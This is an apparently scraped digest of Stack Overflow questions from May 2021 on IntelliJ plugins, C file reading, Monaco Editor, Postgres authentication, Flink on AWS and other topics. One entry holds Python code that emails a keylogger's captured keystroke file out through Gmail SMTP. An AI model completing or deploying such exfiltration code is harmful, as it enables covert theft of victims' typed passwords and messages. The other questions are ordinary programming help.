Monday, May 17, 2021

Recent Questions - Stack Overflow

Recent Questions - Stack Overflow


How to make a input dialog with 2 fields to fill in Intellij plugin

Posted: 17 May 2021 07:49 AM PDT

I use Messages.showInputDialog() to creatre input dialoge, but it only has one field, how to make an input dialog with 2 input fields using Messages?

How to read strings and float of the same line from a file in C

Posted: 17 May 2021 07:49 AM PDT

I want to read a file in C, that has some data about employees from a company. I'm kind a new in C so i have no idea how to do that The file: Each line has some strings and by the end of each line, there's a float number. I know the size of each string. For ex: The first string is a Name: The string name will have a size of 70 Example: Giovani Albuquerc inoval ciano

So, in the file, i will have the name of the employee and the rest of string is composed by spaces. I searched and saw people using fscanf, but with fscanf i can't get the whole name, because the string name can have multiple spaces between, first and second name, third name, etc.
Can someone give me some ideas please ?

Email functionality for keylogger not working

Posted: 17 May 2021 07:49 AM PDT

My code seems fine, I dont get any errors but the email never appears. Where did I go wrong?

the bulk of the code for the email functionality is from https://www.geeksforgeeks.org/send-mail-attachment-gmail-account-using-python/?ref=lbp. I have checked it and it all seems fine.

Heres the code

# From Keylogger code  keys_information = "key_log.txt"     file_path = "D:\\Python\\advkeylogger"   extend = "\\"     # Email functionality  from email.mime.multipart import MIMEMultipart  from email.mime.text import MIMEText  from email.mime.base import MIMEBase  from email import encoders  import smtplib    email_address = "#"   password = "#"    toaddr = "#"    def send_email(filename, attachment, toaddr):       fromaddr = email_address        msg = MIMEMultipart() # look up function of MIMEMultipart        msg['From'] = fromaddr      msg['To']= toaddr      msg['Subject'] = "Log File"        body = "Body_of_the_mail" # make body of email      msg.attach(MIMEText (body, 'plain')) # attach body to message        filename = filename      attachment = open(attachment, 'rb') # open the attachment and read the binary/attachment        p = MIMEBase('application', 'octet-stream') # instance of MIMEBase and named as p      p.set_payload((attachment).read()) # encode our message      encoders.encode_base64(p)      p.add_header('Content-Disposition', "attachment; filename= %s" % filename) # add header      msg.attach(p) # attach p to msg      s = smtplib.SMTP('smtp.gmail.com', 587) # creates SMTP session on port 587      s.starttls() # start TLS for security      s.login(fromaddr, password) # Authentication for login to gmail      text = msg.as_string() # Converts the Multipart msg into a string      s.sendmail(fromaddr, toaddr, text) # sending the mail      s.quit() # terminating the session    send_email(keys_information, file_path + extend + keys_information, toaddr)  

How Monaco Editor completion items provider can wait for async suggestions?

Posted: 17 May 2021 07:49 AM PDT

Goal: Wait custom suggestions from a fake server response.

Problem: I cannot understand how I can tell to Monaco editor completion items provider to wait for async suggestions.

Playground example:

  1. Go to playground
  2. Paste the following code
console.log("1. Instantiate a standalone code editor");    const language = "json"  const content = `{\n\t\"dependencies\": {\n\t\t\n\t}\n}\n`  const options = {    value: content,    language: language,    tabSize: 2  }  const standaloneCodeEditor = monaco.editor.create(document.getElementById("container"), options);  const sce = standaloneCodeEditor;    console.log("2. Declare function to provide a completion items")    function provideCompletionItems(model, position) {    console.log("Invoking function 'provideCompletionItems'")      var textUntilPosition = model.getValueInRange({ startLineNumber: 1, startColumn: 1, endLineNumber: position.lineNumber, endColumn: position.column });    console.log("textUntilPosition:", textUntilPosition)          var match = textUntilPosition.match(/"dependencies"\s*:\s*\{\s*("[^"]*"\s*:\s*"[^"]*"\s*,\s*)*([^"]*)?$/);    console.log("match:", match)      if (!match) {    return { suggestions: [] };    }      var word = model.getWordUntilPosition(position);    console.log("word:", word)      var range = {      startLineNumber: position.lineNumber,      endLineNumber: position.lineNumber,      startColumn: word.startColumn,      endColumn: word.endColumn    };    console.log("range:", range)      const mock_serverResponse = [      {        label: '"lodash"',        kind: monaco.languages.CompletionItemKind.Function,        documentation: "The Lodash library exported as Node.js modules.",        insertText: '"lodash": "*"',        range: range      },      {        label: '"lodash111"',        kind: monaco.languages.CompletionItemKind.Function,        documentation: "The Lodash111 library exported as Node.js modules.",        insertText: '"lodash111": "*"',        range: range      },      {        label: '"express"',        kind: monaco.languages.CompletionItemKind.Function,        documentation: "Fast, unopinionated, minimalist web framework",        insertText: '"express": "*"',        range: range      },      {        label: '"mkdirp"',        kind: monaco.languages.CompletionItemKind.Function,        documentation: "Recursively mkdir, like <code>mkdir -p</code>",        insertText: '"mkdirp": "*"',        range: range      },      {        label: '"my-third-party-library"',        kind: monaco.languages.CompletionItemKind.Function,        documentation: "Describe your library here",        insertText: '"${1:my-third-party-library}": "${2:1.2.3}"',        insertTextRules: monaco.languages.CompletionItemInsertTextRule.InsertAsSnippet,        range: range      }    ]      let myCustomSuggestions = [];    console.log("myCustomSuggestions:",myCustomSuggestions)      setTimeout(() => {      const myPromise = Promise.resolve(mock_serverResponse)      console.log("myPromise:",myPromise)        myPromise        .then(response => {          console.log("response:", response)                  response.forEach(e => myCustomSuggestions.push(e))          console.log("myCustomSuggestions:",myCustomSuggestions)            return {            suggestions: myCustomSuggestions          }        })        .catch(err => console.error(err))     }, 2000)      }    console.log("3. Register completion items provider")  const completionItemProvider = monaco.languages.registerCompletionItemProvider(language, {      provideCompletionItems: () => provideCompletionItems(sce.getModel(), sce.getPosition())  });    
  1. Display web developer console (to see log messages)
  2. Run the program
  3. Type into brackets the word lodash
  4. See web developer console
  5. Notice that no suggestions are displayed

Simple Java Annotation

Posted: 17 May 2021 07:49 AM PDT

My friend and I would like to create a very simple Java annotation (for methods) which will print something simple for every method which is annotated. For example: "This method is annotated with MyCustomAnnotation" (We would then like to add a few stack-trace elements to this printout, so it needs to be flexible enough for this).

What is the simplest code to achieve this?

Our objective is as follows... invoking the following method:

@MyCustomAnnotation      public static int sayBlahAndReturnOne() {          System.out.println("blah");          return 1;      }  

would give the following output:

"This method is annotated with MyCustomAnnotation"  "blah"  

How do we achieve this? What would the @interface annotation look like?

Micronaut gRPC and Micronaut Management

Posted: 17 May 2021 07:48 AM PDT

I am currently in the process of writing up a new application using Micronaut and gRPC. Deployment-wise, I am planning on having this run at a Kubernetes cluster, which in turn means that I would like to enable the management endpoints (for liveliness probes and so on).

I am following the documentation here which seem to state that simple adding the management dependency would automatically expose the various endpoints (granted with the appropriate application.yml properties). I have done that, but I am still unable to access any kind of management endpoint.

For reference my application.yml looks like so:

---  endpoints:    health:      enabled: true      sensitive: false      details-visible: ANONYMOUS    loggers:      enabled: true      write-sensitive: false    threaddump:      enabled: true      sensitive: false  

And my build.gradle file looks like so:

implementation("io.micronaut:micronaut-management")

What am I missing for this to work properly?

pgAdmin and terminal: FATAL: password authentication failed for user

Posted: 17 May 2021 07:48 AM PDT

sup guys! I'm trying to create a server local in pdAdmin 4, but everytime i'm trying to create i get this error:

Error in pgAdmin

in case 'veterano' its my username...

my tries to make this run (but doesnt work)

Checking if Postgres Service is Installed correctly:

$ sudo systemctl is-active postgresql terminal back: active

$ sudo systemctl is-enabled postgresql terminal back: enabled

$ sudo systemctl status postgresql terminal back: active (exited)

$ sudo pg_isready terminal back: /var/run/postgresql:5433 - accepting connections

My configuration to pg_hba.conf :

local   all             postgres                                peer    # TYPE  DATABASE        USER            ADDRESS                 METHOD    # "local" is for Unix domain socket connections only  local   all             all                                     peer  # IPv4 local connections:  host    all             all             127.0.0.1/32            md5  # IPv6 local connections:  host    all             all             ::1/128                 md5  # Allow replication connections from localhost, by a user with the  # replication privilege.  local   replication     all                                     peer  host    replication     all             127.0.0.1/32            md5  host    replication     all             ::1/128                 md5  

(every time after change something in pg_hba.conf I run $ sudo systemctl restart postgresql to restart postgress service.)

Checking psql and the new superusers: $ sudo -u postgres createuser -s $USER

terminal back createuser: error: creation of new role failed: ERROR: role "veterano" already exists if I try psql -U veterano i can login... so i try \du to check list of roles terminal back

                                    List of roles    Role name  |                         Attributes                         | Member of   -------------+------------------------------------------------------------+-----------   postgres    | Superuser, Create role, Create DB, Replication, Bypass RLS | {}   veterano    | Superuser, Create role, Create DB                          | {}    

So I try create a localhost server in terminal: $ psql -h localhost -d mydatabase -U veterano -p 5432

terminal back: Password for user veterano:

(I put my password maked with ALTER USER veterano PASSWORD 'newPassword';)

terminal back error psql: error: FATAL: password authentication failed for user "veterano"

I really don't know what to do... I tried everything and still cant create a local server in pgAdmin 4 or directly in terminal.

Using Ubuntu 20.04.2 LTS

(Sorry for my english )

Optimize an objective function and find out the values of the independent variables in Python

Posted: 17 May 2021 07:48 AM PDT

I have a profit function, which is my objective function profit. Profit is a function of six independent variables profit = f(x1,x2,x3,x4,x5,x6). It is subject to certain capital constraint. The function is iterated as long as the capital is between two values.

My aim is to find the values of the independent variables ( which are real numbers) for which the profit is maximized. Currently, I am manually changing the values of these variables in the code, which uses a dataframe as input, but this method is not efficient and would not yield the optimal result. I thought of using a for loop to iterate over different combination of values for the six variables, but this process would be highly time consuming. Therefore, I wanted to know if there are any libraries in Python that help me with this optimization problem. Also, I would appreciate if you had any suggestions on how to approach this problem.

Python: xml.etree ET.findtext , chops the 1st letter of the text

Posted: 17 May 2021 07:49 AM PDT

I am trying to parse an XML file (PASCAL VOC dataset format) and save the necessary information. I am trying to exctract information from the "object" element. In order to exctract the name subelement text I use obj.findtext('name'). obj is passed as argument and is the first match from for obj in annotation_root.findall('object'): , where annotation root is the parsed xml file.

This is expected to return 'broccoli'. However it returns 'roccoli'. I tried the findtext method with other subelements' of element "object" and it will always chop 1st letter. eg. 'Unspecified' becomes 'nspecified' , '0' returns empty string.

I haven't found anything online regarding this issue, it seems like a bug. Any help is appreciated, thanks!

How do i connect 2 input boxes to a single function in react

Posted: 17 May 2021 07:49 AM PDT

> weightCalc(event) { console.log(event) }  >   >   render() {  >     return (  >       <div>  >   >   >   >   >   > <label>  >         Stones   >   >         <input type="textbox" name="test" onChange={this.weightCalc}/>  >         </label>  >           >         <label>  >           Pounds <input type="textbox" name="test2" onChange={this.weightCalc} />    >         </label>  

i want to be able to use one function with the values from the 2 inputs and then update the state please

android studio capture image faster

Posted: 17 May 2021 07:48 AM PDT

I have a camera application project and I want to take two photos at 200 ms intervals. but usually takes pictures at intervals of 450-550 ms. How can I take photos faster? I open camera surface view and when ı push to button handler start the timer and when time reach to 60000-millisecond camera capture first image and after 200 ms capture the second image

Heading

public class camerax_timer extends AppCompatActivity {    private TextureView textureView;  TextView editColor;    @Override  protected void onCreate(Bundle savedInstanceState)  {      super.onCreate(savedInstanceState);      setContentView(R.layout.activity_camerax_timer);      editColor=findViewById(R.id.textcolor);      textureView = findViewById(R.id.view_finder);        textureView.post((Runnable)(new Runnable()      {          public final void run()          {              startCamera();          }      }));        textureView.addOnLayoutChangeListener(new View.OnLayoutChangeListener()      {          @Override          public void onLayoutChange(View view, int left, int top, int right, int bottom, int oldLeft,       int oldTop, int oldRight, int oldBottom)          {              updateTransform();          }      });        Button button_ileri=findViewById(R.id.ileri_image);      button_ileri.setOnClickListener(new View.OnClickListener() {          @Override          public void onClick(View v) {              Intent intent =new Intent(camerax_timer.this,veri_hesaplama.class);              startActivity(intent);          }      });  }    private void startCamera()  {      PreviewConfig.Builder previewConfig = new PreviewConfig.Builder();        Preview preview = new Preview(previewConfig.build());        preview.setOnPreviewOutputUpdateListener(new Preview.OnPreviewOutputUpdateListener()      {          @Override          public void onUpdated(Preview.PreviewOutput output)          {              ViewGroup parent = (ViewGroup) textureView.getParent();              parent.removeView(textureView);              parent.addView(textureView, 0);                textureView.setSurfaceTexture(output.getSurfaceTexture());              updateTransform();          }      });        ImageCaptureConfig.Builder imageCaptureConfig = new ImageCaptureConfig.Builder();        final ImageCapture imageCapture = new ImageCapture(imageCaptureConfig.build());        final Button button = findViewById(R.id.button);      button.setOnClickListener(new View.OnClickListener()      {          @Override          public void onClick(View view)          {                                      new Handler().postDelayed(new Runnable() {                          @Override                          public void run() {                                imageCapture.takePicture(new ImageCapture.OnImageCapturedListener() {                                  @Override                                  public void onCaptureSuccess(ImageProxy image, int rotationDegrees) {                                      ImageView imageView = findViewById(R.id.img1);                                      imageView.setImageBitmap(imageProxyToBitmap(image));                                      imageView.setRotation(rotationDegrees);                                      image.close();                                  }                              });                          }                      }, 60000);                            new Handler().postDelayed(new Runnable() {                          @Override                          public void run() {                                imageCapture.takePicture(new ImageCapture.OnImageCapturedListener() {                                  @Override                                  public void onCaptureSuccess(ImageProxy image, int rotationDegrees) {                                      ImageView imageView = findViewById(R.id.img2);                                      imageView.setImageBitmap(imageProxyToBitmap(image));                                      imageView.setRotation(rotationDegrees);                                      image.close();                                                                     }                              });                            }                      }, 60200);                }      });        CameraX.bindToLifecycle(this, preview, imageCapture);  }      private void updateTransform()  {      Matrix matrix = new Matrix();        float centerX = textureView.getWidth() / 2f;      float centerY = textureView.getHeight() / 2f;      float rotationDegrees = 0;      matrix.postRotate(-rotationDegrees, centerX, centerY);      textureView.setTransform(matrix);  }  private Bitmap imageProxyToBitmap(ImageProxy image)  {      ImageProxy.PlaneProxy planeProxy = image.getPlanes()[0];      ByteBuffer buffer = planeProxy.getBuffer();      byte[] bytes = new byte[buffer.remaining()];      buffer.get(bytes);      return BitmapFactory.decodeByteArray(bytes, 0, bytes.length);  }  }  

Delete lines from a string that appears in other string

Posted: 17 May 2021 07:49 AM PDT

I have two strings, here an example:

String1:

example1  example2  example3  example4  

and the second string:

example5  example1  example25  

The idea is to delete all the lines that are in both strings, from the first one, and the result must be something like this:

String1:

example2  example3  example4  

The result must be a string too.

How to show/hide button in its click event before and after a synchronous ajax call?

Posted: 17 May 2021 07:49 AM PDT

I need to hide the "Pdf export" button and show loading icon on the start of the button click event and then I need to wait for my ajax request to end and reverse the button state.

But as it is a synchronous ajax call, hide/show button before it, is not visible in the browser as it is reversed again at the end.

$("#ActualButton").hide();  $("#loadingSpinner").show();    $.ajax({                      url: "/Controller/Action",       type: 'POST',       async: false,       success: function (data)         {        }  });    $("#ActualButton").show();  $("#loadingSpinner").hide();  

Q1: How to make the button change visible in Browser?

Q2: Also is there any way to detect completion of ajax call other than making it synchronous?

Interrelating two arrays

Posted: 17 May 2021 07:49 AM PDT

I want to pick a random verb from one array and display its adverb by selecting from another array using a button.

I want to solve the following two issues:

Issue 1:

How do I make the button clickable only for 5 times, and then display a message "Come tomorrow!".

Issue 2:

How do I make the button clickable for an infinite number of times and keep showing the random words.

Here is my code:

const EL_verb = document.querySelector("#verb");  const EL_adverb = document.querySelector("#adverb");  const EL_btn = document.querySelector("#btn");  const verbs = ["Slow", "Quick"];  const adverbs = ["Slowly", "Quickly"];    var i;  for (i = 0; i < verbs.length; i++) {    var randomVerb = verbs[Math.floor(Math.random() * verbs.length)]; //index for a random verb  }    const displayWords = () => {    EL_verb.innerHTML = randomVerb;  };    EL_btn.addEventListener("click", displayWords);
.wrapper {    border: 1px solid #333;    padding: 4px 16px 16px;    border-radius: 3px;  }    #msg {    display: none;  }
<div class="wrapper">    <h2><u>Random Verb and Adverb:</u></h2>    <h3 id="msg">Come tomorrow!</h2>        <p><b>Verb: </b><span id="verb"></span></p>      <p><b>Adverb:</b><span id="adverb"></span></p>        <button id="btn" type="button">RANDOM</button>  </div>

Use range in column values to create new rows in R

Posted: 17 May 2021 07:48 AM PDT

I have a data set that looks like this

id<-c(333,333,333,342,342,342,342)  status<-c('relationship','relationship','married','single','single','married')  start<-c(17,19,25,22,36,40)  end<-c(18,23,29,29,39,44)    dat<-data.frame(id,status,start,end)       id       status start end  1 333 relationship    17  18  2 333 relationship    19  23  3 333      married    25  29  4 342       single    32  35  5 342       single    36  39  6 342       single    42  44  7 342      married    45  50  

My goal is to make a row for each year/age of the person under observation. For example, person 333 is observed from age 17 to 29 (from 17 to 18, this person was in a relationship, 19 to 23 in a relationship), with some gap years (which should be coded unknown). For those whose next episode start year is missing, the end status can be seen as that age's status. But if there is an overlap then the start age status prevails (e.g. if someone is in a relationship 17 to 19, then married 19 to 22, then age 19 should take married as its status). So the end result should look like this:

   id start       status  1  333    17 relationship  2  333    18 relationship  3  333    19 relationship  4  333    20 relationship  5  333    21 relationship  6  333    22 relationship  7  333    23 relationship  8  333    24      unknown  9  333    25      married  10 333    26      married  11 333    27      married  12 333    28      married  13 333    29      married  14 342    22       single  15 342    23       single  16 342    24       single  17 342    25       single  18 342    26       single  19 342    27       single  20 342    28       single  21 342    29       single  22 342    30      unknown  23 342    31      unknown  24 342    32      unknown  25 342    33      unknown  26 342    34      unknown  27 342    35      unknown  28 342    36       single  29 342    37       single  30 342    38       single  31 342    39       single  32 342    40      married  33 342    41      married  34 342    42      married  35 342    43      married  36 342    44      married    

Is there a way of doing this without writing a for loop?

Needed permission to access /dev/diag

Posted: 17 May 2021 07:48 AM PDT

I am trying to open the /dev/diag using JNI as open("/dev/diag", O_RDWR | O_LARGEFILE | O_NONBLOCK); but returning errno: 13 Permission denied.

What should be done to make this work?

When checking the ownership of the /dev/diag using the command ls -l /dev/diag it returns crw-rw-rw- system qcom_diag 244, 0 2015-01-14 01:47 diag and when trying to use the command id i get uid=0(root) gid=0(root) groups=0(root) context=u:r:init:s0

So I thought the problem is related to ownership?

Even tried to add these to my manifest with no luck:

<application        android:sharedUserId="android.uid.system"        android:process="system" .../>  

and to add the permissions referring to https://android.googlesource.com/platform/frameworks/base/+/cd92588/data/etc/platform.xml as:

 <permission android:name="android.permission.DIAGNOSTIC" />   <permission android:name="android.permission.READ_NETWORK_USAGE_HISTORY"/>   <permission android:name="android.permission.MODIFY_NETWORK_ACCOUNTING"/>   <permission android:name="android.permission.LOOP_RADIO" />  

Google Sheets ArrayFormula with Multiple IF / AND / OR Conditions to Return 1 or 0

Posted: 17 May 2021 07:48 AM PDT

I have to determine whether the total driving time per day, for each driver, exceeds 6 hours or not.

There are two columns with start / finish dates and times, but sometimes there are multiple start / finish times for the same day. In this case, the formula should only evaluate to 1 for the first instance of that date. If the dates are different, then it needs to evaluate to 1 if the total driving time for that day is more than 6 hours. I imagine that pice of code in Google Apps Script could potentially resolve this issue, but I have not managed to get anywhere with that.

I have managed to go as far as having the formula evaluate to 1 or 0 if neither the DRIVERS nor the START columns are blank, and the difference between START and FINISH is more than 6 hours, and either the previous or the following START date is the same as the one that is currently being evaluated in the array.

This is the formula that is able to do what I have just explained:

=ARRAYFORMULA(IFERROR(  IF(ISBLANK(A2:A),,  IF(  (B2:B<>"")  *  ((C2:C-B2:B)*24>=6)  *  ((DATEVALUE(TO_DATE(INDEX(SPLIT(B2:B," ",1,1),,1)))=DATEVALUE(TO_DATE(INDEX(SPLIT(OFFSET(B2:B,1,0)," ",1,1),,1)))))  +  ((DATEVALUE(TO_DATE(INDEX(SPLIT(B2:B," ",1,1),,1)))=DATEVALUE(TO_DATE(INDEX(SPLIT(OFFSET(B2:B,-1,0)," ",1,1),,1)))))=1,1,0))))  

The issue that I could not resolve is that

  1. My formula will evaluate to 1 for all instances of the date that is the same as the previous or the next.

  2. The formula does not evaluate to 1 if the date is unique but the driving time is more than 6 hours.

For more information, I have attached a version of the sheet that is focused entirely on this issue here.

enter image description here

I would highly appreciate it if anyone would be kind enough to help me resolve this issue. Also, if my description was not clear enough, please do not hesitate to contact me.

Search data in variable table Excel

Posted: 17 May 2021 07:49 AM PDT

In my Excel file, I have data split up over different tables for different values of parameter X.

I have tables for parameter X for values 0.1, 0.5, 1, 5 and 10. Each table has a parameter Y at the far left that I want to able to search for with a few data cells right of it. Like so:

X = 0.1

Y Data_0 Data_1 Data_2
1 0.071251 0.681281 0.238509
2 0.283393 0.509497 0.397196
3 0.678296 0.789879 0.439004
4 0.788525 0.363215 0.248953

etc.

Now I want to find Data_0, Data_1 and Data_2 for a given X and Y value (in two separate cells).

My thought was naming the tables X0.1 X0.5 etc. and when defining the matrix for the lookup function use some syntax that would change the table it searches in. With three of these functions in adjacent cells, I would obtain the three values desired. Is that possible, or is there some other method that would give me the result I want?

Thanks in advance

On the question what would be my desired result from this data: I would like A1 to give the value for the X I'm searching for (so 0.1 in this case) A2 would be the value of Y (let's pick 3)

then I want C1:E1 to give the values 0.678... 0.789... 0.439...

Now from usmanhaq, I think it should be something like:

=vlookup(A2,concatenate("X",A1),2)  =vlookup(A2,concatenate("X",A1),3)  =vlookup(A2,concatenate("X",A1),4)  

for the three cells. This exact formulation doesn't work and I can't find the formulation that does work.

Is there any reason to continue reading InputStream if number of read byte is 0?

Posted: 17 May 2021 07:48 AM PDT

Usually, when I deal with InputStream, and condition of stop reading is when the number of read byte is less than or equal to 0

For instance,

InputStream in = new FileInputStream(src);  OutputStream out = new FileOutputStream(dst);    // Transfer bytes from in to out  byte[] buf = new byte[1024];  int len;  while ((len = in.read(buf)) > 0) {      out.write(buf, 0, len);  }  

However, when I look at the documentation of InputStream

https://docs.oracle.com/javase/7/docs/api/java/io/InputStream.html#read(byte[])

Only I notice that

-1 if there is no more data because the end of the stream has been reached.

I was wondering, should I refactor my code to

InputStream in = new FileInputStream(src);  OutputStream out = new FileOutputStream(dst);    // Transfer bytes from in to out  byte[] buf = new byte[1024];  int len;  while ((len = in.read(buf)) != -1) {      if (len > 0) {          out.write(buf, 0, len);      }  }  

Will there be any edge case checking for while ((len = in.read(buf)) > 0) is going to cause any unwanted bug?

How to connect to JBoss EAP 7.3 using VisualVM in OpenShift

Posted: 17 May 2021 07:49 AM PDT

I am trying to connect an application with VisualVM, but VisualVM unable to connect with application: Below is the env:

  • JBoss EAP 7.3
  • Java 11
  • OpenShift

I have tried to configure it in different ways, but all failed:

Config try 1: Use few env variables in script file, so that it could execute first (file contents are mentioned below): echo *** Adding system property for VisulVM ***

batch  /system-property=jboss.modules.system.pkgs:add(value="org.jboss.byteman,com.manageengine,org.jboss.logmanager")  /system-property=java.util.logging.manager:add(value="org.jboss.logmanager.LogManager")  run-batch  

I can see that above commands executed successfully and above properties are available in JBoss config (I verified using Jboss cli command).

JAVA_TOOLS_OPTIONS: -agentlib:jdwp=transport=dt_socket,server=y,address=8000,suspend=n -Dcom.sun.management.jmxremote=true -Dcom.sun.management.jmxremote.port=3000 -Dcom.sun.management.jmxremote.rmi.port=3001 -Djava.rmi.server.hostname=127.0.0.1 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Xbootclasspath/a:/opt/eap/modules/system/layers/base/org/jboss/log4j/logmanager/main/log4j-jboss-logmanager-1.2.0.Final-redhat-00001.jar -Xbootclasspath/a:/opt/eap/modules/system/layers/base/org/jboss/logmanager/main/jboss-logmanager-2.1.14.Final-redhat-00001.jar  

Result:

- java.lang.RuntimeException: WFLYCTL0079: Failed initializing module org.jboss.as.logging  - Caused by: java.util.concurrent.ExecutionException: java.lang.IllegalStateException: WFLYLOG0078: The logging subsystem requires the log manager to be org.jboss.logmanager.LogManager. The subsystem has not be initialized and cannot be used. To use JBoss Log Manager you must add the system property "java.util.logging.manager" and set it to "org.jboss.logmanager.LogManager"  

Config 2:

JAVA_TOOL_OPTIONS= -agentlib:jdwp=transport=dt_socket,server=y,address=8000,suspend=n -Dcom.sun.management.jmxremote=true -Dcom.sun.management.jmxremote.port=3000 -Dcom.sun.management.jmxremote.rmi.port=3001 -Djava.rmi.server.hostname=127.0.0.1 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.util.logging.manager=org.jboss.logmanager.LogManager -Djboss.modules.system.pkgs=org.jboss.byteman,org.jboss.logmanager -Xbootclasspath/a:/opt/eap/modules/system/layers/base/org/jboss/log4j/logmanager/main/log4j-jboss-logmanager-1.2.0.Final-redhat-00001.jar -Xbootclasspath/a:/opt/eap/modules/system/layers/base/org/jboss/logmanager/main/jboss-logmanager-2.1.14.Final-redhat-00001.jar  

Result:

WARNING: Failed to instantiate LoggerFinder provider; Using default.  java.lang.IllegalStateException: The LogManager was not properly installed (you must set the "java.util.logging.manager" system property to "org.jboss.logmanager.LogManager")  

Config 3:

• Modify in standalone.conf, where I put all required configuration in this file.

Result:

WARNING: Failed to instantiate LoggerFinder provider; Using default.  java.lang.IllegalStateException: The LogManager was not properly installed (you must set the "java.util.logging.manager" system property to "org.jboss.logmanager.LogManager")  

Kindly suggest that what is the correct configurations?

python equation calculation with exp() function

Posted: 17 May 2021 07:48 AM PDT

Here is the equation I'm tryin' to solve:

original

the correct answer most be 0.347 and this is what I got:

from math import *    exp(((-4.4 + 0.6*(0.6/1.2))*tan(25)) + ((3.07*sin(25))*(log(2*4.29))/(1+sin(25))))  

output:

0.6318  

I tried to use radians : tan(radians(25)) I keep getting wrong results

python need to convert a "linspace" into something more "logarithmic"

Posted: 17 May 2021 07:49 AM PDT

Forgive me, I'm always been very bad at math, now trying to learn some python (and some math aswell) by coding.

I have this:

import numpy as np  import matplotlib.pyplot as plt    whole = 1 # percentage: 1 = 100%, 0.1 = 10% ecc   nparts = 10 # how many "steps" we want to use  origin = 100 # starting value we    ranged = origin * whole # defining the percentage of our starting value    values = np.linspace(origin - ranged/2, origin + ranged/2, nparts * 2)    r = []  g = []  for v in values:      if v > origin:          r.append(v)          #reds = f"{v} is {100*(v - origin)/origin}% of {origin}"          #print(reds)        else:          g.append(v)          #greens = f"{v} is {100*(v - origin)/origin}% of {origin}"          #print(greens)                      print("reds")  print(r)  print("greens")  print(g)  

These last print(g) and print(r) output the numerical results.

If I plot this, you can clearly see what this does.

axes = plt.gca()    #origin BLUE   plt.axhline(y=origin, color='b', linestyle='-')    #reds  for i in r:          plt.axhline(y=i, color='r', linestyle='-')  #greens  for i in g:          plt.axhline(y=i, color='g', linestyle='-')  

plot

So as you can see given an origin (blue line) and giving a +/- percentage whole it creates n lines ( nparts ) both reds if they are > origin and green if < origin spreading them linearly values = np.linspace(origin - ranged/2, origin + ranged/2, nparts * 2) on this whole percentage from the origin value

now my question is: how can I spread those lines on a logarithmic way (don't get me wrong, I'm so bad at math I don't even know if what I'm looking for is logarithmic-related) I would like to achieve something like this (I did photoshop the plotted image). I would really love to keep that whole and maybe being able to add a new variable to "control" this logarithmic spreading

basically I need to find a way to find another function to replace values = np.linspace(origin - ranged/2, origin + ranged/2, nparts * 2) to achieve the desired result attached below. I tried both np.geomspace and np.logspace without any success, maybe I'm just bad or maybe I need to find another way to do this.

Desired result: desired result

Can you help me solve this out? Thanks a lot.

Windowing is not triggered when we deployed the Flink application into Kinesis Data Analytics

Posted: 17 May 2021 07:49 AM PDT

We have an Apache Flink POC application which works fine locally but after we deploy into Kinesis Data Analytics (KDA) it does not emit records into the sink.

Used technologies

Local

  • Source: Kafka 2.7
    • 1 broker
    • 1 topic with partition of 1 and replication factor 1
  • Processing: Flink 1.12.1
  • Sink: Managed ElasticSearch Service 7.9.1 (the same instance as in case of AWS)

AWS

  • Source: Amazon MSK Kafka 2.8
    • 3 brokers (but we are connecting to one)
    • 1 topic with partition of 1, replication factor 3
  • Processing: Amazon KDA Flink 1.11.1
    • Parallelism: 2
    • Parallelism per KPU: 2
  • Sink: Managed ElasticSearch Service 7.9.1

Application logic

  1. The FlinkKafkaConsumer reads messages in json format from the topic
  2. The jsons are mapped to domain objects, called Telemetry
private static DataStream<Telemetry> SetupKafkaSource(StreamExecutionEnvironment environment){      Properties kafkaProperties = new Properties();      kafkaProperties.setProperty(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, "BROKER1_ADDRESS.amazonaws.com:9092");      kafkaProperties.setProperty(ConsumerConfig.GROUP_ID_CONFIG, "flink_consumer");        FlinkKafkaConsumer<String> consumer = new FlinkKafkaConsumer<>("THE_TOPIC", new SimpleStringSchema(), kafkaProperties);        consumer.setStartFromEarliest(); //Just for repeatable testing        return environment              .addSource(consumer)              .map(new MapJsonToTelemetry());  }  
  1. The Telemetry's timestamp is chosen for EventTimeStamp.
    3.1. With forMonotonousTimeStamps
  2. Telemetry's StateIso is used for keyBy.
    4.1. The two letter iso code of the state of USA
  3. 5 seconds tumbling window strategy is applied
private static SingleOutputStreamOperator<StateAggregatedTelemetry> SetupProcessing(DataStream<Telemetry> telemetries) {      WatermarkStrategy<Telemetry> wmStrategy =              WatermarkStrategy                      .<Telemetry>forMonotonousTimestamps()                      .withTimestampAssigner((event, timestamp) -> event.TimeStamp);        return telemetries              .assignTimestampsAndWatermarks(wmStrategy)              .keyBy(t -> t.StateIso)              .window(TumblingEventTimeWindows.of(Time.seconds(5)))              .process(new WindowCountFunction());  }  
  1. A custom ProcessWindowFunction is called to perform some basic aggregation.
    6.1. We calculate a single StateAggregatedTelemetry
  2. ElasticSearch is configured as sink.
    7.1. StateAggregatedTelemetry data are mapped into a HashMap and pushed into source.
    7.2. All setBulkFlushXYZ methods are set to low values
private static void SetupElasticSearchSink(SingleOutputStreamOperator<StateAggregatedTelemetry> telemetries) {      List<HttpHost> httpHosts = new ArrayList<>();      httpHosts.add(HttpHost.create("https://ELKCLUSTER_ADDRESS.amazonaws.com:443"));        ElasticsearchSink.Builder<StateAggregatedTelemetry> esSinkBuilder = new ElasticsearchSink.Builder<>(              httpHosts,              (ElasticsearchSinkFunction<StateAggregatedTelemetry>) (element, ctx, indexer) -> {                  Map<String, Object> record = new HashMap<>();                    record.put("stateIso", element.StateIso);                  record.put("healthy", element.Flawless);                  record.put("unhealthy", element.Faulty);                  ...                    LOG.info("Telemetry has been added to the buffer");                  indexer.add(Requests.indexRequest()                          .index("INDEXPREFIX-"+ from.format(DateTimeFormatter.ofPattern("yyyy-MM-dd")))                          .source(record, XContentType.JSON));              }      );        //Using low values to make sure that the Flush will happen      esSinkBuilder.setBulkFlushMaxActions(25);      esSinkBuilder.setBulkFlushInterval(1000);      esSinkBuilder.setBulkFlushMaxSizeMb(1);      esSinkBuilder.setBulkFlushBackoff(true);      esSinkBuilder.setRestClientFactory(restClientBuilder -> {});        LOG.info("Sink has been attached to the DataStream");      telemetries.addSink(esSinkBuilder.build());  }  

Excluded things

  • We managed to put Kafka, KDA and ElasticSearch under the same VPC and same subnets to avoid the need to sign each request
  • From the logs we could see that the Flink can reach the ES cluster.
    Request
